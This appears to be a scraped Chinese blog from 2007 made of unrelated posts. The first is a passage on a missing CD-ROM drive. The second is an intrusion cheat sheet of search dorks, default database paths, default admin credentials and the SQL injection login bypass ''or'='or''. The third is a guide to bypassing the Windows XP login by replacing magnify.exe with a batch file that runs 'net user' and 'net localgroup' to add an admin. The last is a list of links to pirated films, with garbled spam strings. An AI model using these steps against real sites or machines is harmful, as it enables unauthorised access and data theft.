如果我们在CONFIG.SYS文件中设置了“LASTDRIVE=?”的数量小于实际的驱动器数量,这时即使我们***了光驱,但在“我的电脑“中了看不焦馇挠白印U馐敝灰サ舾孟钌柚没蛏柚梦狶ASTDRIVE=Z即可。
3.DMA设置不当
如果光驱只支持PIO4标准,不支持DMA/33标准,而我们却强行让光驱使用该标准(在“我的电脑”属性中“设备管理器”中光驱CDROM属性中“设置”选项的DMA前打“√”号)。这时有时会造成光驱丢失,有时会造成电脑不能正常启动。这时我们可以进入安全模式,将CDROM属性中的DMA设置去掉就可以了。我们所使用的硬盘或者光驱具体支持何种数据传输模式,我们在计算机启动过程中的第二屏的基本配置表中可以看到。
4.光驱在注册表里被恶意屏蔽掉了
如果有人在“我的电脑”HKEY_CURRENT_USERSoftwareMicrosoft
CurrentVrsionPolicesxplorer中的NoDrivers的二进制值是否是光驱的值。正常情况下没有该项,也可将该项值改为00000000(01000000为A,04000000为C,FFFFFFFF为隐藏所有驱动器)。
注意:现在有的病毒专门更改注册表,使光驱盘符丢失,害得我们又是格式化硬盘,又是装系统的。有的病毒不会使光驱盘符丢失,但是会禁止光驱读盘,什么样的光盘也不能读,但在却能够用光盘启动。
5.光驱的驱动是否***正确
如果光驱的驱动程序***的不是它自己的驱动程序,也会出现光驱丢失的情况。这种情况的出现一般是为了提高光驱的性能,人为的添加从网络或者光盘中找到的光驱加速程序或者其他程序。通常在WIN98和95中都自带了光驱的驱动,不需要另外添加。这时可进入安全模式将“设备管理器”中的CDROM选项删除,然后重新启动计算机,让系统自己发现新硬件重新***光驱的驱动即可。
6.CMOS设置不当
如果在CMOS设置中传输模式设置有误——不支持PIOMODE3或PIOMODE4或者DMA/33的老光驱便会在WIN98或者95中出现没有光驱的图标。这时,只需要进入CMOS中将INTEGRATEDPERIPHERAIS项、IDEPRIMARYMASTERPIO(或UDMA)和IDEPRIMARYSL***EPIO(或UDMA)改为AUTO即可。对了,如果我们在CMOS中将对应光驱的IDE接口DISABLE掉了,光驱无论如何也发现不了的。
7.使用虚拟光驱不当
虚拟光驱可以避免频繁读取光盘,提高读取速度,为我们方便地玩光盘游戏提供了可能。不过有时我们在不想使用虚拟光驱程序时,想卸载它或者想***最新的程序时,却出现了意外,虚拟光驱的盘符有,但实际光驱的盘符却没有了。
( Sat, 23 Jun 2007 13:20:14 +0800 )
Description: 默认数据库:Databases/myszw.md Databases/myszw1.mdb
上传 upload_Photo.a ?PhotoUrlID=3 upload_Photo.a ?PhotoUrlID=1
----------------------------------------------------
关键字:网站建设公司企业网站管理系统
后缀: admin/login.a ---------------------------------------
关键字:网梦购物系统 gCS木马
GOOGLE里搜索关键字:
上面的这个名字只是该留言者使用的昵称,不代表任何管理员身份! 把index.a 换成 mdb/vc ook.a 代码:
---------------------------------------
关键子:inurl:Went.a 后缀:manage/login.a 密码:'or''=''or' ============================
关键字:acblog
blogdata/acblog.asa 默认数据库。
======================================= 关键字:Copyright ? 2005-2008??Power
然后写入默认数据库:databa /datashop.a 在网址后面加上主页后面加上:linktianjia.a 申请连接输入一句话代码:
或者点下面的管理入口 密码:'or'='or' 一句话连接的时候在网站后面加上:databa /datashop.a ========================================================
关键词 co net mib ver 1.0 design by hypo 搜索网站 http://www.yahoo.cn
密码 'or'='or' ============================================== 新云漏洞:把/flash/downfile.a ?url=uploadfile/../../co .a 提交到网站根目录。就可以下载co .a 找到数据库地址比如 www.123.com 这个站 那么数据库地址就是http://www.123.com/database\xzws.mdb大家时常碰到数据库如果前面或者中间+了#可以用%23替换就可以下载了如:#xzws.mdb 改成%23xzws.mdb那么数据库就是http://www.123.com/database\%23xzws.mdb然后下载数据库 ======================================================
网站猎手 一句话木马
关键字:Powered by BBSXP 7.00 后缀:DataBase\BBSXP7.mdb
默认后台:/ xp/Login.a ===================================== 关键字:Management Ver 3.0 Build 20030628
后缀:upload.a 一:网站猎手 t0/fF'GZD 二:明小子
三:ASP木马 =DUs
====================
密码:'or'='or'
搜索:WEB Manage Ver 1.0
LQT Ver 1.0 Design By wm 6 Web Development By Ver 1.0 Final
Web Management Ver 1.0 Design By Ck8
=====================================
edit.a ?table=
edit.a ?boardname= action=
cnunews= news_mai acode=
a ?id=1
a ?id=2 &idx=
edit.a ?idx=
啊D注入工具 百度搜索
=========================
搜索:Co Net MIB Ver1.0网站后台管理系统 ===============================================
用到工具:挖掘鸡
后缀添加:admin/login.a 搜索关键词:申请会员有什么好处?
密码:'or'='or'
=================================
啊D注入工具--百度----关键子:admin
==================================== 挖掘机关键字:Powered by WEBBOY页面:/upfile.a 网站猎手关键字:Powered by mypower 后缀:upfile_photo.a upfile_softpic.a upfile_adpic.a ======================
关键字:Power BY:VenShop V7.01 Copyright:VenShop.Com
密码:'or'='or'
======================= ;:
关键字:powered by mypower
漏洞页面:upfile_photo.a Upfile_Soft.a upfile_adpic.a upfile_softpic.a ===============================
关键字:选购-加入购物车-去收银台-确认收货人信息-选付款方式-选配送方式-在线支付或下单后汇款-汇款确认-发货-完成
漏洞页面:upload.a upfile_flash.a =============================
网上搜索 inurl:manage/login.a ======================================
关键字:Power BY:VenShop V7.01
后台地址:ad_login.a 密码:'or'='or'
====================
关键字:Powered by WEBBOY
后缀:/upfile.a 工具:明小子上传
====================
关键词:inurl: a ?=数字 inurl: php?=数字 ===========================
关键字:went.a 后缀:manage/login.a ==========================
添加后缀/msmir_net.md 搜索:inurl:Msmir_DownLoads
===============================
关键字Powered By :SMT Version 5.0
后缀:upfile_flash.a ===========================
关键字:你要入侵的类别 inurl:a 工具:啊D注入工具
==================================
========================================
一、入侵BBSXP系统:
用到的工具:网站猎手 数据库小助手 MD5密码破解工具
关键词:广告合作
管理员登陆地址:BBS主页
默认数据库地址:/DATABASE/BBSXP.MDB
-----------------------------------------
二、入侵动网论坛
用到工具:网站猎手 数据库小助手 MD5密码破解工具
关键词:powered by dv 默认数据库地址:data/dv 7.md 或者Databackup/dv 7.mdb或者 /Databackup/dv 7.mdb
或者/ /Data/dv 7.md 管理员登陆地址:BBS主页
默认管理员帐号密码:admin admin888
--------------------------------------
三、入侵新云系统
用到的工具:数据库小助手 MD5密码破解工具 挖掘鸡 ?N6'*2{NT eIEr\X4\~~ 关键词:本站所提供的程序均来自于 Internet 所以无法保证下载后一定可以***
管理员登陆地址:/admin/admin_login.a U 默认数据库:database/#newa .mdb(因为加了#在浏览器是无法连接的。所以我们要改成%23) database/%23newa .mdb
默认管理员帐号密码:admin admin
----------------------------------- 四、入侵无忧传奇系统
用到的工具:网站猎手 数据库小助手 MD5密码破解工具 关键字: inurl:Msmir_DownLoad 默认数据库地址:数据库连接:/msmir_net.mdb 或/msmir/msmir.mdb
管理员登陆地址:admin.a 默认管理员帐号密码:msmir msmir
( Wed, 20 Jun 2007 22:33:46 +0800 )
Description: 有许多朋友还在为忘记XP登陆密码不能进入系统而烦恼,现在我就来给你带来解决的方法.
所需工具
1.U盘一个
2.U oot(U盘启动制作软件)
3.winrar(压缩软件)
这个方法我亲自实验过,并且成功的绕过了XP的登陆密码.我在学校机房做过实验,但是文件格式为FAT32,就不知道NTFS的行不行?本来想一起实验的,结果我的光驱在学校机器上用不起(我的光驱有问题,机器太老了!--穷),学校的机器都是FAT32的,没办法!只有下次做了!
先说说思路:方法很简单,当你的机器出现登陆框,要求输入密码时,你按下windows键+U看看有什么反映……?不错!出现了辅助工具管理工具(呵呵~~意味着可以运行放大镜)。既然可以运行放大镜程序,那么我们把放大镜程序换成其他的程序是不是也可以运行呢?(我把它换成添加用户的程序不就…………呵呵~~好坏!)思路就是这样的了!现在我们开始制作。
①.制作U盘启动盘。先运行U oot,然后插入U盘,选中U盘然后点开始。(要破坏U盘上的文件哦!小心!),格式化完了把U盘拔了,然后它会提示你再插入,插入U盘1分后就可以了!我的U盘是1G的,用的HDD格式。
②.制作替换文件。要制作一个XX.EXE的文件来替换原文件,但是这个XX.EXE执行后又要达到添加用户的要求。我首先想到的是写一个批处理文件:
@net user hack 123456 /add
@net localgroup administraroes hack /add
然后保存为XX.bat就可以了!
又有人要问我了,我们要的是XX.EXE你却给我们弄个XX.bat你什么意思嘛?
问得好!我们让它运行XX.EXE就等同运行了XX.bat不就可以了嘛!
要达到这样的目的,就要用到winrar,用winrar制作一个自解压文件,不就把XX.bat变成XX.EXE了吗?运行XX.EXE就等同运行了XX.bat.(把XX.EXE拷到U 盘上去)
③.替换文件.到COMS里去把第一启动换到USB-HDD,保存----插入U盘,进入系统的c:\windows\system32下去. copy magnify.exe 007magnify.exe(对magnify.exe进行备份,magnify.exe为放大镜执行程序).在把U盘上的XX.EXE拷到system32下,并该为magnify.exe就可以了!
然后从硬盘启动就可以了!再到XP登陆密码时,你只要运行放大镜就可以了!按下Ctrl+Alt+Del(按2次)用你新建的hack用户就可以进去了!进去把管理员密码改过来吧!
这样就成功的绕过了XP的登陆密码,只要了一个U盘,好方便.
( Tue, 19 Jun 2007 23:08:18 +0800 )
Description: 斗牛士
thunder://QUFmdHA6Ly9kbjpkbkBmdHAuam02NzguY29tOjIwMDEwL1s2NuW9seinhnd3dy42NnlzLmNu5o+Q5L6b6L+F6Zu35LiL6L29XeaWl+eJm+Wjq0RWROWbveiv
[生死时速2][经典动作大片][DVD国语配音/有截图/已测]
thunder://QUFmdHA6Ly9zczI6c3MyQGZ0cC5qbTY3OC5jb206MjAwMTAvWzY25b2x6KeGd3d3LjY2eXMuY27mj5Dkvpvov4Xpm7fkuIvovb1d55Sf5q275pe26YCfMkRWROWbveivrS5ybXZiWlo
[战争之王][经典动作大片][DVD国语配音/有截图/已测]
易域风
thunder://QUFmdHA6Ly94ZDp4ZEBmdHAuam02NzguY29tOjIwMDEwL1s2NuW9seinhnd3dy42NnlzLmNu5o+Q5L6b6L+F6Zu35LiL6L29Xei+m+W+t+WLkueahOWQjeWNlURWROWbveivrS5ybXZiWlo
太阳之泪/战鹰一号 正版DVD国语配音
电影,音乐,幽默,帖图,动漫,游戏,BT,体育,文学www.yy11.c A,x6bCc%pQ
thunder://QUFmdHA6Ly9neT eUAyMTEuMTQxLjExOS45MToxMDAwNy9bNjblvbHop4Z3d3cuNjZ5cy5jbuaPkOS+m+i/hembt+S4i+i9vV3lpKrpmLPkuYvms6pEVkTlm73or61DRDEucm12Ylpa
www.yy11.c ` w.W$vBD
thunder://QUFmdHA6Ly9neT eUAyMTEuMTQxLjExOS45MToxMDAwNy9bNjblvbHop4Z3d3cuNjZ5cy5jbuaPkOS+m+i/hembt+S4i+i9vV3lpKrpmLPkuYvms6pEVkTlm73or61DRDIucm12Ylpa
WhT!m"B3K
thunder://QUFmdHA6Ly9neT eUAyMTEuMTQxLjExOS45MToxMDAwNy9bNjblvbHop4Z3d3cuNjZ5cy5jbuaPkOS+m+i/hembt+S4i+i9vV3lpKrpmLPkuYvms6pEVkTlm73or61DRDMucm12Ylpa
天崩地裂 正版DVD国语配音
易域风情社区论坛[ www.yy11.cn]电影.软件.音乐x:{|3 a
thunder://QUFmdHA6Ly9neT eUAyMTEuMTQxLjExOS45MToxMDAwNy9bNjblvbHop4Z3d3cuNjZ5cy5jbuaPkOS+m+i/hembt+S4i+i9vV3lpKnltKnlnLDoo4JEVkTlm73or61DRDEucm12Ylpa
易域风情社区论坛[www.yy11.cn ]电影.软件.音乐F$z}B EP;IV7z
thunder://QUFmdHA6Ly9neT eUAyMTEuMTQxLjExOS45MToxMDAwNy9bNjblvbHop4Z3d3cuNjZ5cy5jbuaPkOS+m+i/hembt+S4i+i9vV3lpKnltKnlnLDoo4JEVkTlm73or61DRDIucm12Ylpa
电影,音乐,幽默,帖图,动漫,游戏,BT,体育,文学)ETS}3~4f"[
thunder://QUFmdHA6Ly9neT eUAyMTEuMTQxLjExOS45MToxMDAwNy9bNjblvbHop4Z3d3cuNjZ5cy5jbuaPkOS+m+i/hembt+S4i+i9vV3lpKnltKnlnLDoo4JEVkTlm73or61DRDMucm12Ylpa
猛虎营DVD国语配音 经典战争大片
thunder://QUFmdHA6Ly9taDptaEAyMTEuMTQxLjExOS45MToxMDAwNy9bNjblvbHop4Z3d3cuNjZ5cy5jbuaPkOS+m+i/hembt+S4i+i9vV3njJvomY7okKVEVkTlm73or61DRDEucm12Ylpa
/s9Wj`e6IPW&R
易域风情社区论坛[www.yy11.cn ]电影.软件.音乐R"gG
P"Bz#s8Ngt3lj
thunder://QUFmdHA6Ly9taDptaEAyMTEuMTQxLjExOS45MToxMDAwNy9bNjblvbHop4Z3d3cuNjZ5cy5jbuaPkOS+m+i/hembt+S4i+i9vV3njJvomY7okKVEVkTlm73or61DRDIucm12Ylpa
生死豪情DVD国语配音 丹泽尔·华盛顿经典
易域风情;v*`:fXuqm4~9_r
thunder://QUFmdHA6Ly9zczpzc0AyMTEuMTQxLjExOS45MToxMDAwNy9bNjblvbHop4Z3d3cuNjZ5cy5jbuaPkOS+m+i/hembt+S4i+i9vV3nlJ/mrbvosarmg4VEVkTlm73or61DRDEucm12Ylpa
电影,音乐,幽默,帖图,动漫,游戏,BT,体育,文学Z8y|5c.\ J5v
thunder://QUFmdHA6Ly9zczpzc0AyMTEuMTQxLjExOS45MToxMDAwNy9bNjblvbHop4Z3d3cuNjZ5cy5jbuaPkOS+m+i/hembt+S4i+i9vV3nlJ/mrbvosarmg4VEVkTlm73or61DRDIucm12Ylpa
电影,音乐,幽默,帖图,动漫,游戏,BT,体育,文学 /@j@&[
thunder://QUFmdHA6Ly9zczpzc0AyMTEuMTQxLjExOS45MToxMDAwNy9bNjblvbHop4Z3d3cuNjZ5cy5jbuaPkOS+m+i/hembt+S4i+i9vV3nlJ/mrbvosarmg4VEVkTlm73or61DRDMucm12Ylpa
[尖峰时刻1][成龙经典动作喜剧][DVD国语配音/有截图/已测]
thunder://QUFmdHA6Ly9qZjE6amYxQGZ0cC42NnlzLmNuOjEwMDA5L1s2NuW9seinhnd3dy42NnlzLmNu5o+Q5L6b6L+F6Zu35LiL6L29XeWwluWzsOaXtuWIuzFEVkTlm73or61DRDEucm12Ylpa
thunder://QUFmdHA6Ly9qZjE6amYxQGZ0cC42NnlzLmNuOjEwMDA5L1s2NuW9seinhnd3dy42NnlzLmNu5o+Q5L6b6L+F6Zu35LiL6L29XeWwluWzsOaXtuWIuzFEVkTlm73or61DRDIucm12Ylpa
2E [尖峰时刻2][成龙经典动作][DVD国语配音/有截图/已测]
thunder://QUFmdHA6Ly9qZjpqZkBmdHAuam02NzguY29tOjIwMDA5L1s2NuW9seinhnd3dy42NnlzLmNu5o+Q5L6b6L+F6Zu35LiL6L29XeWwlumUi+aXtuWIuzJEVkTlm73or61DRDEucm12Ylpa
电影,音乐,幽默,帖图,动漫,
